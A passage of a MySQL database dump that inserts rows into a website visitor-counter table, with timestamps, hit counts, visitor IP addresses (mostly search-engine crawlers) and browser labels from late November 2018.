.36.149.4','other'),(342838,1543496450,1,1,0,0,'66.249.64.201','chrome'),(342839,1543496451,1,1,0,0,'66.249.64.222','chrome'),(342840,1543496852,1,1,0,0,'66.249.64.218','chrome'),(342841,1543496880,1,1,0,0,'54.36.149.19','other'),(342842,1543497039,1,1,0,0,'54.36.149.36','other'),(342843,1543497079,3,3,0,0,'91.196.178.92','chrome'),(342844,1543497217,1,1,0,0,'54.36.148.86','other'),(342845,1543497256,1,1,0,0,'54.36.149.2','other'),(342846,1543497341,1,1,0,0,'46.229.168.151','other'),(342847,1543497342,1,1,0,0,'54.36.148.120','other'),(342848,1543497544,1,1,0,0,'54.36.148.41','other'),(342849,1543497737,1,1,0,0,'54.36.149.63','other'),(342850,1543497845,2,2,0,0,'37.53.89.92','chrome'),(342851,1543497903,2,2,0,0,'78.111.185.15','chrome'),(342852,1543497950,1,1,0,0,'54.36.149.33','other'),(342853,1543497965,1,1,0,0,'95.163.255.180','other'),(342854,1543497969,1,1,0,0,'95.163.255.174','other'),(342855,1543497983,1,1,0,0,'54.36.148.173','other'),(342856,1543498287,2,2,0,0,'207.46.13.216','other'),(342857,1543498303,1,1,0,0,'207.46.13.215','other'),(342858,1543498366,6,6,0,0,'178.154.244.11','other'),(342859,1543498408,1,1,0,0,'141.8.183.22','other'),(342860,1543498422,1,1,0,0,'5.45.207.79','other'),(342861,1543498470,4,4,0,0,'178.154.244.29','other'),(342862,1543498610,1,1,0,0,'141.8.142.103','other'),(342863,1543498833,2,2,0,0,'91.196.178.92','chrome'),(342864,1543499006,1,1,0,0,'54.36.148.75','other'),(342865,1543499375,1,1,0,0,'54.36.148.141','other'),(342866,1543500023,1,1,0,0,'54.36.148.29','other'),(342867,1543500309,1,1,0,0,'54.36.149.94','other'),(342868,1543500335,1,1,0,0,'178.154.244.11','other'),(342869,1543500380,1,1,0,0,'178.154.244.29','other'),(342870,1543500804,1,1,0,0,'54.36.148.169','other'),(342871,1543500835,1,1,0,0,'54.36.149.21','other'),(342872,1543500852,1,1,0,0,'66.249.66.44','chrome'),(342873,1543500929,1,1,0,0,'207.46.13.215','other'),(342874,1543501132,2,2,0,0,'91.196.178.86','firefox'),(342875,1543501253,1,1,0,0,'37.55.227.190','chrome'),(342876,1543501547,1,1,0,0,'46.229.168.144','other'),(342877,1543501619,2,2,0,0,'207.46.13.218','other'),(342878,1543501751,1,1,0,0,'54.36.149.65','other'),(342879,1543501978,1,1,0,0,'54.36.148.125','other'),(342880,1543502119,1,1,0,0,'54.36.149.88','other'),(342881,1543502177,1,1,0,0,'66.249.66.155','chrome'),(342882,1543502179,1,1,0,0,'66.249.66.152','chrome'),(342883,1543502432,1,1,0,0,'207.46.13.216','other'),(342884,1543502464,1,1,0,0,'46.229.168.154','other'),(342885,1543502467,1,1,0,0,'46.229.168.136','other'),(342886,1543502483,1,1,0,0,'46.229.168.139','other'),(342887,1543502654,1,1,0,0,'8.29.198.27','other'),(342888,1543502684,1,1,0,0,'54.36.149.5','other'),(342889,1543502685,1,1,0,0,'54.36.148.92','other'),(342890,1543502892,1,1,0,0,'46.229.168.132','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (342891,1543502895,1,1,0,0,'46.229.168.140','other'),(342892,1543503096,1,1,0,0,'54.36.149.99','other'),(342893,1543503305,1,1,0,0,'207.46.13.217','other'),(342894,1543503406,1,1,0,0,'54.36.148.163','other'),(342895,1543503520,1,1,0,0,'54.36.148.37','other'),(342896,1543503541,2,2,0,0,'93.76.96.233','firefox'),(342897,1543503704,3,3,0,0,'195.10.210.49','chrome'),(342898,1543503731,1,1,0,0,'54.36.148.24','other'),(342899,1543503800,1,1,0,0,'54.36.148.62','other'),(342900,1543503937,1,1,0,0,'54.36.148.50','other'),(342901,1543504058,1,1,0,0,'37.53.125.42','msie'),(342902,1543504069,1,1,0,0,'54.36.148.231','other'),(342903,1543504437,1,1,0,0,'8.29.198.27','other'),(342904,1543504807,1,1,0,0,'54.36.148.234','other'),(342905,1543504914,1,1,0,0,'8.29.198.25','other'),(342906,1543505296,1,1,0,0,'54.36.148.205','other'),(342907,1543505801,2,2,0,0,'91.196.178.130','firefox'),(342908,1543505839,2,2,0,0,'91.196.178.174','chrome'),(342909,1543505944,1,1,0,0,'54.36.148.129','other'),(342910,1543506441,1,1,0,0,'95.132.1.234','firefox'),(342911,1543506607,1,1,0,0,'54.36.149.79','other'),(342912,1543506622,6,6,0,0,'195.10.210.49','chrome'),(342913,1543506653,1,1,0,0,'54.36.149.22','other'),(342914,1543506658,1,1,0,0,'54.36.149.73','other'),(342915,1543506686,1,1,0,0,'54.36.149.82','other'),(342916,1543506780,1,1,0,0,'54.36.149.37','other'),(342917,1543507004,1,1,0,0,'54.36.148.232','other'),(342918,1543507088,1,1,0,0,'54.36.148.133','other'),(342919,1543507160,1,1,0,0,'54.36.148.100','other'),(342920,1543507211,1,1,0,0,'54.36.148.79','other'),(342921,1543507269,1,1,0,0,'37.52.150.144','chrome'),(342922,1543507308,1,1,0,0,'54.36.148.53','other'),(342923,1543507718,1,1,0,0,'180.76.15.161','other'),(342924,1543508060,1,1,0,0,'54.36.148.152','other'),(342925,1543508091,1,1,0,0,'54.36.148.10','other'),(342926,1543508388,2,2,0,0,'207.46.13.216','other'),(342927,1543508475,2,2,0,0,'46.211.24.46','chrome'),(342928,1543508494,1,1,0,0,'46.229.168.134','other'),(342929,1543508496,1,1,0,0,'46.229.168.146','other'),(342930,1543508657,1,1,0,0,'54.36.148.85','other'),(342931,1543508735,1,1,0,0,'54.36.148.60','other'),(342932,1543509160,1,1,0,0,'54.36.149.102','other'),(342933,1543509465,1,1,0,0,'178.154.244.29','other'),(342934,1543509469,1,1,0,0,'178.154.244.11','other'),(342935,1543509578,1,1,0,0,'66.249.66.42','chrome'),(342936,1543509718,1,1,0,0,'180.76.15.15','other'),(342937,1543509719,1,1,0,0,'180.76.15.141','other'),(342938,1543510396,1,1,0,0,'54.36.149.31','other'),(342939,1543510404,5,5,0,0,'178.154.244.29','other'),(342940,1543510466,1,1,0,0,'95.108.213.4','other'),(342941,1543510540,1,1,0,0,'37.9.113.148','other'),(342942,1543510643,1,1,0,0,'54.36.148.135','other'),(342943,1543510672,1,1,0,0,'54.36.149.6','other'),(342944,1543510794,1,1,0,0,'207.46.13.218','other'),(342945,1543511173,1,1,0,0,'37.9.113.103','other'),(342946,1543511390,2,2,0,0,'178.154.244.29','other'),(342947,1543511414,2,2,0,0,'46.211.24.46','chrome'),(342948,1543511559,1,1,0,0,'54.36.148.117','other'),(342949,1543511681,1,1,0,0,'54.36.148.192','other'),(342950,1543511693,1,1,0,0,'54.36.148.185','other'),(342951,1543512498,2,2,0,0,'178.154.244.29','other'),(342952,1543513091,1,1,0,0,'207.46.13.215','other'),(342953,1543513499,1,1,0,0,'8.29.198.27','other'),(342954,1543513876,1,1,0,0,'54.36.148.242','other'),(342955,1543514179,1,1,0,0,'54.36.149.98','other'),(342956,1543514924,1,1,0,0,'40.77.167.214','other'),(342957,1543514929,1,1,0,0,'40.77.167.217','other'),(342958,1543515004,1,1,0,0,'66.249.66.156','chrome'),(342959,1543515015,1,1,0,0,'66.249.66.152','chrome'),(342960,1543515143,1,1,0,0,'46.229.168.139','other'),(342961,1543515225,1,1,0,0,'40.77.167.218','other'),(342962,1543515229,1,1,0,0,'40.77.167.220','other'),(342963,1543515284,1,1,0,0,'8.29.198.25','other'),(342964,1543515287,1,1,0,0,'66.249.66.154','chrome'),(342965,1543515486,1,1,0,0,'54.36.149.53','other'),(342966,1543515612,1,1,0,0,'54.36.149.56','other'),(342967,1543515750,1,1,0,0,'8.29.198.27','other'),(342968,1543516020,1,1,0,0,'54.36.148.175','other'),(342969,1543516073,1,1,0,0,'82.145.209.63','other'),(342970,1543516131,1,1,0,0,'46.229.168.134','other'),(342971,1543516460,1,1,0,0,'40.77.167.218','other'),(342972,1543516465,1,1,0,0,'40.77.167.220','other'),(342973,1543516765,1,1,0,0,'46.229.168.132','other'),(342974,1543516981,1,1,0,0,'207.46.13.217','other'),(342975,1543517329,1,1,0,0,'54.36.148.105','other'),(342976,1543517412,1,1,0,0,'54.36.148.91','other'),(342977,1543517433,1,1,0,0,'66.249.66.155','chrome'),(342978,1543517451,1,1,0,0,'66.249.66.152','chrome'),(342979,1543517452,1,1,0,0,'109.162.125.13','chrome'),(342980,1543517469,1,1,0,0,'207.46.13.218','other'),(342981,1543517727,1,1,0,0,'54.36.149.97','other'),(342982,1543518542,1,1,0,0,'54.36.148.77','other'),(342983,1543518861,1,1,0,0,'46.229.168.153','other'),(342984,1543518976,1,1,0,0,'46.229.168.150','other'),(342985,1543518978,1,1,0,0,'46.229.168.140','other'),(342986,1543519007,1,1,0,0,'54.36.148.94','other'),(342987,1543519398,1,1,0,0,'93.78.184.175','chrome'),(342988,1543519704,1,1,0,0,'54.36.148.232','other'),(342989,1543519719,2,2,0,0,'46.229.168.145','other'),(342990,1543519796,1,1,0,0,'54.36.148.151','other'),(342991,1543519912,1,1,0,0,'54.36.148.128','other'),(342992,1543519916,1,1,0,0,'46.229.168.151','other'),(342993,1543520094,1,1,0,0,'46.229.168.152','other'),(342994,1543520351,1,1,0,0,'149.20.246.98','chrome'),(342995,1543520401,1,1,0,0,'104.144.236.9','chrome'),(342996,1543520700,2,2,0,0,'91.196.178.98','chrome'),(342997,1543520752,1,1,0,0,'54.36.148.62','other'),(342998,1543520974,1,1,0,0,'93.78.184.175','chrome'),(342999,1543521154,4,4,0,0,'5.45.207.79','other'),(343000,1543521171,18,18,0,0,'178.154.244.29','other'),(343001,1543521266,1,1,0,0,'54.36.148.103','other'),(343002,1543521276,1,1,0,0,'178.154.244.11','other'),(343003,1543521321,1,1,0,0,'54.36.148.150','other'),(343004,1543521430,2,2,0,0,'95.108.213.4','other'),(343005,1543521690,2,2,0,0,'46.229.168.150','other'),(343006,1543521891,1,1,0,0,'46.229.168.149','other'),(343007,1543522008,1,1,0,0,'54.36.148.195','other'),(343008,1543522297,1,1,0,0,'54.36.149.60','other'),(343009,1543522453,1,1,0,0,'66.249.66.156','chrome'),(343010,1543522717,2,2,0,0,'207.46.13.216','other'),(343011,1543522924,1,1,0,0,'23.101.169.3','msie'),(343012,1543522951,1,1,0,0,'95.163.255.105','other'),(343013,1543523301,1,1,0,0,'54.36.148.247','other'),(343014,1543523698,1,1,0,0,'54.36.148.186','other'),(343015,1543523713,1,1,0,0,'95.163.255.106','other'),(343016,1543523784,2,2,0,0,'162.210.196.98','other'),(343017,1543523829,1,1,0,0,'54.36.149.103','other'),(343018,1543524137,1,1,0,0,'95.163.255.105','other'),(343019,1543524207,1,1,0,0,'207.46.13.218','other'),(343020,1543524316,1,1,0,0,'46.229.168.143','other'),(343021,1543524351,1,1,0,0,'8.29.198.27','other'),(343022,1543524640,1,1,0,0,'54.36.148.167','other'),(343023,1543524659,1,1,0,0,'95.163.255.118','other'),(343024,1543524736,1,1,0,0,'54.36.148.97','other'),(343025,1543524747,1,1,0,0,'46.211.55.34','chrome'),(343026,1543524796,1,1,0,0,'54.36.148.79','other'),(343027,1543525284,1,1,0,0,'95.163.255.104','other'),(343028,1543525376,1,1,0,0,'46.229.168.147','other'),(343029,1543525475,1,1,0,0,'54.36.148.57','other'),(343030,1543525553,1,1,0,0,'54.36.149.75','other'),(343031,1543525784,1,1,0,0,'95.163.255.102','other'),(343032,1543525982,1,1,0,0,'54.36.148.100','other'),(343033,1543526090,1,1,0,0,'54.36.148.219','other'),(343034,1543526154,1,1,0,0,'8.29.198.25','other'),(343035,1543526169,1,1,0,0,'54.36.148.86','other'),(343036,1543526417,1,1,0,0,'46.211.66.51','chrome'),(343037,1543526586,1,1,0,0,'8.29.198.27','other'),(343038,1543526756,1,1,0,0,'54.36.149.43','other'),(343039,1543526820,1,1,0,0,'207.46.13.216','other'),(343040,1543527165,1,1,0,0,'54.36.149.92','other'),(343041,1543527473,1,1,0,0,'46.229.168.148','other'),(343042,1543527475,1,1,0,0,'46.229.168.154','other'),(343043,1543527532,1,1,0,0,'54.36.148.128','other'),(343044,1543528274,24,24,0,0,'95.216.38.186','other'),(343045,1543528379,1,1,0,0,'23.101.169.3','msie'),(343046,1543528594,1,1,0,0,'54.36.149.63','other'),(343047,1543528611,1,1,0,0,'54.36.148.105','other'),(343048,1543528701,1,1,0,0,'66.249.66.156','chrome'),(343049,1543529377,14,14,0,0,'95.216.41.162','other'),(343050,1543529715,11,11,0,0,'178.154.244.29','other'),(343051,1543529722,6,6,0,0,'178.154.244.11','other'),(343052,1543529748,1,1,0,0,'5.45.207.79','other'),(343053,1543529757,1,1,0,0,'37.9.113.148','other'),(343054,1543529856,1,1,0,0,'5.45.207.19','other'),(343055,1543529880,1,1,0,0,'207.46.13.217','other'),(343056,1543530063,1,1,0,0,'54.36.148.45','other'),(343057,1543530657,1,1,0,0,'54.36.148.104','other'),(343058,1543530798,1,1,0,0,'54.36.149.43','other'),(343059,1543530866,1,1,0,0,'54.36.148.251','other'),(343060,1543530927,1,1,0,0,'54.36.149.26','other'),(343061,1543531469,1,1,0,0,'54.36.148.143','other'),(343062,1543531529,1,1,0,0,'54.36.149.81','other'),(343063,1543531971,1,1,0,0,'54.36.148.122','other'),(343064,1543531979,1,1,0,0,'54.36.149.50','other'),(343065,1543532159,1,1,0,0,'46.229.168.138','other'),(343066,1543532162,1,1,0,0,'46.229.168.130','other'),(343067,1543532233,1,1,0,0,'54.36.148.105','other'),(343068,1543532542,1,1,0,0,'54.36.148.202','other'),(343069,1543532897,1,1,0,0,'54.36.148.28','other'),(343070,1543532909,1,1,0,0,'46.229.168.147','other'),(343071,1543533059,1,1,0,0,'54.36.148.98','other'),(343072,1543533491,1,1,0,0,'207.46.13.216','other'),(343073,1543533504,1,1,0,0,'54.36.148.16','other'),(343074,1543533552,1,1,0,0,'46.229.168.151','other'),(343075,1543533797,1,1,0,0,'54.36.149.84','other'),(343076,1543533843,2,2,0,0,'178.154.244.29','other'),(343077,1543533857,2,2,0,0,'54.36.148.88','other'),(343078,1543533861,1,1,0,0,'54.36.149.39','other'),(343079,1543533930,1,1,0,0,'54.36.148.110','other'),(343080,1543533949,1,1,0,0,'54.36.148.14','other'),(343081,1543534300,1,1,0,0,'23.101.169.3','msie'),(343082,1543534714,1,1,0,0,'54.36.148.198','other'),(343083,1543534796,1,1,0,0,'207.46.13.218','other'),(343084,1543535198,1,1,0,0,'8.29.198.25','other'),(343085,1543535755,1,1,0,0,'54.36.148.21','other'),(343086,1543535811,1,1,0,0,'192.42.116.18','other'),(343087,1543535816,1,1,0,0,'207.46.13.215','other'),(343088,1543535882,1,1,0,0,'54.36.148.174','other'),(343090,1543535928,1,1,0,0,'66.249.66.154','chrome'),(343091,1543536475,1,1,0,0,'54.36.149.46','other'),(343092,1543536665,1,1,0,0,'54.36.148.22','other'),(343093,1543536693,1,1,0,0,'54.36.148.103','other'),(343094,1543537000,2,2,0,0,'8.29.198.25','other'),(343095,1543537135,1,1,0,0,'54.36.149.66','other'),(343096,1543537229,1,1,0,0,'46.229.168.134','other'),(343097,1543537587,4,4,0,0,'178.154.244.11','other'),(343098,1543537593,1,1,0,0,'54.36.148.26','other'),(343099,1543537627,1,1,0,0,'207.46.13.215','other'),(343100,1543537651,7,7,0,0,'178.154.244.29','other'),(343101,1543537706,1,1,0,0,'54.36.148.114','other'),(343102,1543538039,1,1,0,0,'207.46.13.218','other'),(343103,1543538119,1,1,0,0,'46.229.168.151','other'),(343104,1543538478,1,1,0,0,'66.249.66.156','chrome'),(343105,1543538491,1,1,0,0,'66.249.66.152','chrome'),(343106,1543538492,1,1,0,0,'207.46.13.217','other'),(343107,1543538794,1,1,0,0,'54.36.148.241','other'),(343108,1543538864,1,1,0,0,'46.229.168.129','other'),(343109,1543538866,1,1,0,0,'46.229.168.137','other'),(343110,1543538896,1,1,0,0,'54.36.148.173','other'),(343111,1543539263,1,1,0,0,'54.36.148.72','other'),(343112,1543539674,1,1,0,0,'95.163.255.103','other'),(343113,1543539705,1,1,0,0,'95.163.255.114','other'),(343114,1543539720,1,1,0,0,'54.36.149.0','other'),(343115,1543539922,1,1,0,0,'54.36.148.53','other'),(343116,1543540172,1,1,0,0,'66.249.66.155','chrome'),(343117,1543540179,1,1,0,0,'66.249.66.152','chrome'),(343118,1543540391,1,1,0,0,'54.36.148.249','other'),(343119,1543540932,1,1,0,0,'46.229.168.150','other'),(343120,1543540934,1,1,0,0,'46.229.168.133','other'),(343121,1543541107,1,1,0,0,'66.249.66.152','chrome'),(343122,1543541385,1,1,0,0,'54.36.148.54','other'),(343123,1543541913,1,1,0,0,'54.36.148.199','other'),(343124,1543542019,1,1,0,0,'23.101.169.3','msie'),(343125,1543542048,1,1,0,0,'54.36.148.196','other'),(343126,1543542269,1,1,0,0,'46.229.168.138','other'),(343127,1543542271,1,1,0,0,'46.229.168.140','other'),(343128,1543542382,1,1,0,0,'46.229.168.134','other'),(343129,1543542593,2,2,0,0,'173.252.87.7','other'),(343130,1543542640,1,1,0,0,'31.184.238.133','chrome'),(343131,1543542815,1,0,1,0,'66.249.66.156',''),(343133,1543543114,1,0,1,0,'66.249.66.57',''),(343134,1543543115,1,0,1,0,'66.249.66.40',''),(343135,1543543280,1,1,0,0,'54.36.149.70','other'),(343136,1543543975,1,1,0,0,'54.36.148.217','other'),(343137,1543544058,2,2,0,0,'207.46.13.216','other'),(343138,1543544167,1,1,0,0,'54.36.148.176','other'),(343139,1543544421,1,1,0,0,'54.36.148.184','other'),(343140,1543544508,1,1,0,0,'54.36.148.177','other'),(343141,1543544737,1,1,0,0,'54.36.148.246','other'),(343142,1543544760,1,1,0,0,'207.46.13.215','other'),(343143,1543544794,1,1,0,0,'54.36.148.88','other'),(343144,1543545033,1,1,0,0,'54.36.148.241','other'),(343145,1543545435,1,1,0,0,'37.9.113.148','other'),(343146,1543545470,1,1,0,0,'5.45.207.79','other'),(343147,1543545513,1,1,0,0,'178.154.244.29','other'),(343148,1543545528,1,1,0,0,'87.250.224.65','other'),(343149,1543545535,1,1,0,0,'141.8.183.23','other'),(343150,1543545550,1,1,0,0,'141.8.183.11','other'),(343151,1543545627,1,1,0,0,'93.158.166.7','other'),(343152,1543545691,1,1,0,0,'87.250.224.118','other'),(343153,1543545694,1,1,0,0,'213.180.203.53','other'),(343154,1543545745,1,1,0,0,'178.154.244.11','other'),(343155,1543545832,1,1,0,0,'178.154.171.24','other'),(343156,1543545901,1,1,0,0,'178.154.171.30','other'),(343157,1543545954,1,1,0,0,'54.36.148.55','other'),(343158,1543546034,1,1,0,0,'8.29.198.26','other'),(343159,1543546141,1,1,0,0,'178.154.244.21','other'),(343160,1543546193,1,1,0,0,'66.249.66.61','chrome'),(343161,1543546194,1,1,0,0,'66.249.66.44','chrome'),(343162,1543546574,1,1,0,0,'54.36.149.54','other'),(343163,1543546813,1,1,0,0,'54.36.148.164','other'),(343164,1543547279,1,1,0,0,'54.36.148.25','other'),(343165,1543547435,1,1,0,0,'54.36.148.220','other'),(343166,1543547791,1,1,0,0,'207.46.13.216','other'),(343167,1543547797,1,1,0,0,'54.36.149.100','other'),(343168,1543547848,2,2,0,0,'8.29.198.25','other'),(343169,1543548158,2,2,0,0,'207.46.13.218','other'),(343170,1543548199,1,1,0,0,'54.36.149.78','other'),(343171,1543548532,2,2,0,0,'5.45.207.8','other'),(343172,1543548702,1,1,0,0,'54.36.149.68','other'),(343173,1543549208,1,1,0,0,'51.68.88.4','chrome'),(343174,1543549212,1,1,0,0,'66.249.66.40','chrome'),(343175,1543549226,1,1,0,0,'54.36.148.167','other'),(343176,1543549511,13,13,0,0,'144.76.91.79','other'),(343177,1543549574,1,1,0,0,'178.140.132.154','msie'),(343178,1543550356,1,1,0,0,'46.4.106.120','other'),(343179,1543550989,1,1,0,0,'54.36.148.68','other'),(343180,1543551363,1,1,0,0,'141.8.142.65','other'),(343181,1543551400,1,1,0,0,'66.249.66.155','chrome'),(343183,1543551494,2,2,0,0,'34.210.86.201','chrome'),(343184,1543551615,1,1,0,0,'54.36.148.42','other'),(343185,1543551849,1,1,0,0,'54.36.149.43','other'),(343186,1543552035,1,1,0,0,'54.36.148.114','other'),(343187,1543552144,1,1,0,0,'46.229.168.150','other'),(343188,1543552149,1,1,0,0,'46.229.168.149','other'),(343189,1543552246,1,1,0,0,'54.36.148.13','other'),(343190,1543552307,2,2,0,0,'207.46.13.216','other'),(343191,1543552318,1,1,0,0,'54.36.149.90','other'),(343192,1543552379,2,2,0,0,'66.249.66.154','chrome'),(343193,1543552424,1,1,0,0,'54.36.148.23','other'),(343194,1543552462,1,1,0,0,'95.163.255.171','other'),(343195,1543552465,1,1,0,0,'95.163.255.192','other'),(343196,1543552808,1,1,0,0,'54.36.148.134','other'),(343197,1543552845,1,1,0,0,'66.249.66.152','chrome'),(343198,1543553297,1,1,0,0,'54.36.148.22','other'),(343199,1543553348,1,1,0,0,'54.36.148.123','other'),(343200,1543553432,1,1,0,0,'207.46.13.218','other'),(343201,1543553465,1,1,0,0,'207.46.13.216','other'),(343202,1543553617,1,1,0,0,'87.250.224.118','other'),(343203,1543553710,1,1,0,0,'5.45.207.8','other'),(343204,1543553714,1,1,0,0,'178.154.200.48','other'),(343205,1543553761,2,2,0,0,'141.8.183.23','other'),(343206,1543553787,1,1,0,0,'66.249.66.61','chrome'),(343207,1543553788,2,2,0,0,'66.249.66.40','chrome'),(343208,1543553814,1,1,0,0,'54.36.148.105','other'),(343209,1543553838,2,2,0,0,'178.154.171.30','other'),(343210,1543554143,1,1,0,0,'95.108.213.4','other'),(343211,1543554161,1,1,0,0,'178.154.171.24','other'),(343212,1543554191,2,2,0,0,'207.46.13.215','other'),(343213,1543554286,1,1,0,0,'213.180.203.53','other'),(343214,1543554347,1,1,0,0,'141.8.142.65','other'),(343215,1543554383,1,1,0,0,'37.9.113.148','other'),(343216,1543554401,1,1,0,0,'178.154.171.17','other'),(343217,1543554486,1,1,0,0,'54.36.148.203','other'),(343218,1543554509,1,1,0,0,'87.250.224.107','other'),(343219,1543554769,1,1,0,0,'141.8.142.103','other'),(343220,1543555221,1,1,0,0,'54.36.148.72','other'),(343221,1543555511,1,1,0,0,'54.36.148.152','other'),(343222,1543555796,1,1,0,0,'54.36.148.122','other'),(343223,1543555876,1,1,0,0,'54.36.148.44','other'),(343224,1543556117,1,1,0,0,'66.249.66.61','chrome'),(343225,1543556142,1,1,0,0,'66.249.66.40','chrome'),(343226,1543556675,1,1,0,0,'54.36.149.67','other'),(343227,1543556722,1,1,0,0,'54.36.148.20','other'),(343228,1543556869,1,1,0,0,'8.29.198.27','other'),(343229,1543557388,1,1,0,0,'54.36.149.77','other'),(343230,1543557424,1,1,0,0,'54.36.148.107','other'),(343231,1543557523,1,1,0,0,'54.36.149.97','other'),(343232,1543557592,1,1,0,0,'66.249.66.154','chrome'),(343233,1543558255,2,2,0,0,'66.249.66.152','chrome'),(343234,1543558558,2,2,0,0,'66.249.66.156','chrome'),(343235,1543558604,1,1,0,0,'54.36.148.22','other'),(343236,1543558695,2,2,0,0,'8.29.198.27','other'),(343237,1543558881,1,1,0,0,'66.249.66.44','chrome'),(343238,1543559080,1,1,0,0,'178.154.244.29','other'),(343239,1543559105,1,1,0,0,'54.36.149.4','other'),(343240,1543559330,1,1,0,0,'91.196.178.75','chrome'),(343241,1543559826,1,1,0,0,'178.95.246.220','chrome'),(343242,1543559833,1,1,0,0,'66.249.66.156','chrome'),(343243,1543560003,3,3,0,0,'66.249.66.152','chrome'),(343244,1543560394,1,1,0,0,'95.163.255.94','other'),(343245,1543560397,1,1,0,0,'95.163.255.97','other'),(343246,1543560409,1,1,0,0,'54.36.149.102','other'),(343247,1543561019,1,1,0,0,'54.36.148.71','other'),(343248,1543561159,1,1,0,0,'66.249.66.44','chrome'),(343249,1543561297,1,1,0,0,'66.249.66.57','chrome'),(343250,1543561298,1,1,0,0,'66.249.66.40','chrome'),(343251,1543561490,1,1,0,0,'54.36.148.92','other'),(343252,1543561530,1,1,0,0,'66.249.66.155','chrome'),(343254,1543561609,1,1,0,0,'178.154.244.11','other'),(343255,1543561647,1,1,0,0,'93.78.184.35','firefox'),(343257,1543561831,1,1,0,0,'54.36.148.25','other'),(343258,1543561842,1,1,0,0,'207.46.13.217','other'),(343259,1543561870,1,1,0,0,'46.229.168.137','other'),(343260,1543561936,1,0,1,0,'66.249.66.42',''),(343261,1543561947,1,1,0,0,'54.36.149.37','other'),(343262,1543562024,3,3,0,0,'95.132.1.234','firefox'),(343263,1543562042,1,1,0,0,'54.36.148.91','other'),(343264,1543562102,1,1,0,0,'37.55.193.59','chrome'),(343265,1543562186,1,1,0,0,'93.78.184.35','chrome'),(343266,1543562244,1,1,0,0,'46.229.168.152','other'),(343267,1543562391,2,2,0,0,'207.46.13.216','other'),(343268,1543562671,1,1,0,0,'66.249.66.157','chrome'),(343269,1543562672,2,2,0,0,'66.249.66.156','chrome'),(343270,1543562677,1,1,0,0,'66.249.66.152','chrome'),(343271,1543563139,1,1,0,0,'54.36.148.81','other'),(343272,1543563158,2,2,0,0,'66.249.66.40','chrome'),(343273,1543563606,1,1,0,0,'66.249.66.156','chrome'),(343274,1543563739,1,1,0,0,'46.229.168.153','other'),(343275,1543563836,1,1,0,0,'66.249.66.44','chrome'),(343276,1543563856,1,1,0,0,'54.36.149.17','other'),(343277,1543563868,1,1,0,0,'66.249.66.157','chrome'),(343278,1543563869,1,1,0,0,'66.249.66.154','chrome'),(343279,1543563970,1,1,0,0,'178.154.244.11','other'),(343280,1543563971,1,1,0,0,'5.45.207.79','other'),(343281,1543564367,1,1,0,0,'95.132.1.234','firefox'),(343282,1543564375,1,1,0,0,'54.36.148.15','other'),(343283,1543564406,1,1,0,0,'178.154.244.29','other'),(343284,1543564585,1,1,0,0,'54.36.149.66','other'),(343285,1543565118,1,1,0,0,'207.46.13.218','other'),(343286,1543565159,1,1,0,0,'178.54.79.203','chrome'),(343287,1543565253,2,2,0,0,'78.111.190.19','chrome'),(343288,1543565495,1,1,0,0,'54.36.148.144','other'),(343289,1543565528,1,1,0,0,'54.36.148.236','other'),(343290,1543565724,1,1,0,0,'66.249.66.156','chrome'),(343291,1543565726,1,1,0,0,'54.36.149.72','other'),(343292,1543565744,1,1,0,0,'66.249.66.152','chrome'),(343293,1543565772,2,2,0,0,'52.53.201.78','chrome'),(343294,1543565819,1,1,0,0,'207.46.13.215','other'),(343295,1543566705,1,1,0,0,'94.178.2.144','chrome'),(343296,1543566710,2,2,0,0,'66.249.66.156','chrome'),(343297,1543566711,2,2,0,0,'66.249.66.152','chrome'),(343298,1543566889,1,1,0,0,'66.249.66.157','chrome'),(343299,1543567330,1,1,0,0,'54.36.149.104','other'),(343300,1543567396,1,1,0,0,'54.36.148.79','other'),(343301,1543567402,1,1,0,0,'46.229.168.145','other'),(343302,1543567408,1,1,0,0,'66.249.66.154','chrome'),(343303,1543567410,1,1,0,0,'46.229.168.139','other'),(343304,1543567438,1,1,0,0,'54.36.148.84','other'),(343305,1543567454,1,1,0,0,'54.36.148.74','other'),(343306,1543567516,1,1,0,0,'54.36.148.174','other'),(343307,1543567717,1,1,0,0,'8.29.198.25','other'),(343308,1543567816,1,1,0,0,'54.36.148.221','other'),(343309,1543567959,1,1,0,0,'46.229.168.130','other'),(343310,1543568067,2,2,0,0,'66.249.66.157','chrome'),(343311,1543568083,1,1,0,0,'54.36.148.224','other'),(343312,1543568226,1,1,0,0,'54.36.148.180','other'),(343313,1543568367,1,1,0,0,'178.154.244.29','other'),(343314,1543568605,1,1,0,0,'54.36.149.58','other'),(343315,1543568683,1,1,0,0,'66.249.66.42','chrome'),(343316,1543568957,1,1,0,0,'66.249.66.154','chrome'),(343317,1543568983,1,1,0,0,'66.249.66.44','chrome'),(343318,1543569077,1,1,0,0,'54.36.148.150','other'),(343319,1543569108,1,1,0,0,'54.36.148.12','other'),(343320,1543569547,2,2,0,0,'8.29.198.27','other'),(343321,1543569775,2,2,0,0,'66.249.66.152','chrome'),(343322,1543569783,1,1,0,0,'95.134.222.186','chrome'),(343323,1543570060,1,1,0,0,'54.36.148.132','other'),(343324,1543570095,1,1,0,0,'66.249.66.156','chrome'),(343325,1543570160,2,2,0,0,'94.179.129.42','chrome'),(343326,1543570212,9,9,0,0,'178.154.244.29','other'),(343327,1543570331,1,1,0,0,'54.36.148.94','other'),(343329,1543570432,1,1,0,0,'54.36.148.177','other'),(343330,1543570474,2,2,0,0,'46.229.168.145','other'),(343331,1543570481,1,1,0,0,'46.229.168.149','other'),(343332,1543570502,1,1,0,0,'54.36.149.27','other'),(343333,1543570510,6,6,0,0,'178.154.244.11','other'),(343334,1543570511,2,2,0,0,'162.210.196.98','other'),(343335,1543570532,2,2,0,0,'5.45.207.79','other'),(343336,1543570754,1,1,0,0,'95.163.255.108','other'),(343337,1543570763,3,3,0,0,'95.163.255.104','other'),(343338,1543570774,3,3,0,0,'95.163.255.103','other'),(343339,1543570791,2,2,0,0,'95.163.255.102','other'),(343340,1543570811,1,1,0,0,'95.163.255.117','other'),(343341,1543570818,1,1,0,0,'95.163.255.109','other'),(343342,1543570826,1,1,0,0,'95.163.255.107','other'),(343343,1543570833,1,1,0,0,'95.163.255.106','other'),(343344,1543570848,1,1,0,0,'95.163.255.112','other'),(343345,1543570872,2,2,0,0,'95.163.255.105','other'),(343346,1543570885,1,1,0,0,'207.46.13.217','other'),(343347,1543570890,1,1,0,0,'95.163.255.116','other'),(343348,1543570899,2,2,0,0,'95.163.255.119','other'),(343349,1543571034,1,1,0,0,'54.36.149.78','other'),(343350,1543571134,1,1,0,0,'95.163.255.118','other'),(343351,1543571195,5,5,0,0,'178.154.244.29','other'),(343352,1543571206,1,1,0,0,'46.229.168.136','other'),(